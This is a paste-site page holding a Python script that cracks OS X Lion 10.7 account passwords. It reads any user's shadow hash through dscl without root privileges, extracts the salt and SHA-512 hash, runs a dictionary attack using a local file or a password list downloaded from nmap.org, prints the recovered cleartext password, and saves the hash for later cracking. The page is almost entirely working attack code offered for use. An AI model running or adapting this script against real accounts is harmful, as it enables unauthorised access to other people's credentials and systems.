OS X Lion Password Cracker

SUBMITTED BY: Guest

DATE: Nov. 12, 2013, 8:46 p.m.

FORMAT: Text only

SIZE: 3.2 kB

Raw Download

HITS: 715

Report
  1. ##########################################
  2. #* OS X Lion 10.7 Password Cracker
  3. #* UID 0 NOT required
  4. #*
  5. #* Usage:
  6. #* python lion_crack.py [username] [dictionary]
  7. #*
  8. #*
  9. #* Patrick Dunstan
  10. #* Sep 18, 2011
  11. #* http://www.defenceindepth.net
  12. #*
  13. ###########################################
  14. from subprocess import *
  15. import hashlib
  16. import os
  17. import urllib2
  18. import sys
  19. from string import *
  21. link = "http://nmap.org/svn/nselib/data/passwords.lst" # Online password file
  22. defaultuser = False
  23. username = ""
  25. def check(password): # Hash password and compare
  27. if not password.startswith("#!"): # Ignore comments
  29. guess = hashlib.sha512(salt_hex + password).hexdigest()
  30. print("Trying... " + password)
  32. if guess == hash:
  33. print("Cleartext password for user '"+username+"' is : "+password)
  34. exit(0)
  36. if len(sys.argv) < 2:
  37. print("No username given. Defaulting to current user.")
  38. defaultuser = True
  39. else:
  40. username = sys.argv[1]
  42. p = Popen("whoami", shell=True, stdout=PIPE)
  43. whoami = p.communicate()[0]
  45. if defaultuser:
  46. username = whoami.rstrip()
  48. p = Popen("dscl localhost -read /Search/Users/" + username, shell=True, stdout=PIPE)
  49. dscl_out = p.communicate()[0]
  51. list = dscl_out.split("\n")
  53. for pos,item in enumerate(list): # extract digest
  54. if "dsAttrTypeNative:ShadowHashData" in item:
  55. digest = list[pos+1].replace(" ", "")
  57. if len(digest) == 262: # Out of box configuration
  58. salt = digest[56:64]
  59. hash = digest[64:192]
  60. elif len(digest) == 314: # SMB turned on
  61. print("SMB is on")
  62. salt = digest[104:112]
  63. hash = digest[112:240]
  64. elif len(digest) == 1436: # Lion Server
  65. salt = digest[176:184]
  66. hash = digest[176:304]
  67. elif len(digest) == 1492: # Lion Server with SMB
  68. salt = digest[224:232]
  69. hash = digest[232:360]
  71. print("SALT : " + salt)
  72. print("HASH : " + hash)
  74. salt_hex = chr(int(salt[0:2], 16)) + chr(int(salt[2:4], 16)) + chr(int(salt[4:6], 16)) + chr(int(salt[6:8], 16))
  76. if len(sys.argv) == 3: # If dictionary file specified
  77. print("Reading from dictionary file '"+sys.argv[2]+"'.")
  78. check(whoami.rstrip())
  79. passlist = open(sys.argv[2], "r")
  80. password = passlist.readline()
  82. while password:
  83. check(password.rstrip())
  84. password = passlist.readline()
  85. passlist.close()
  87. else: # No dictionary file specified
  88. print("No dictionary file specified. Defaulting to hard coded link.")
  90. passlist = urllib2.urlopen(link) # Download dictionary file
  91. passwords = passlist.read().split("\n")
  92. print("\nPassword list successfully read")
  94. passwords.append(whoami.rstrip())
  96. print("\nCracking...")
  97. for password in passwords:
  98. check(password)
  100. # Save hash for later
  101. print("\nSaving hash to "+username+".hash...")
  102. out = open(username+".hash", "w")
  103. out.write(salt+hash)
  104. out.close()
  106. print("\nPassword not found. Try another dictionary.\n")
comments powered by Disqus